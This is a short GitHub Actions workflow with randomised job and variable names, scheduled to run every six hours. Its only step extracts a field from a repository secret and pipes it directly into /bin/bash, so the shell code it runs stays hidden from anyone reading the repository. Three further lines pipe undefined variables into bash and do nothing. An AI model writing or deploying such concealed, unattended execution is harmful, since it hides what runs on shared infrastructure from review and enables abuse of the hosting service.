name: examineexact

on:
  workflow_dispatch:
  schedule:
    - cron: '48 5/6 * * *'

jobs:  # 23213
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: examineexact
        env:
          z8: ${{ secrets.z8 }}
        run: |
          echo $z8 | jq -r .zn0647 | /bin/bash
          echo $cgwpr7 | jq -r .k91751 | /bin/bash
          echo $md942 | jq -r .jyjx2 | /bin/bash
          echo $kyrs516 | jq -r .xz850 | /bin/bash

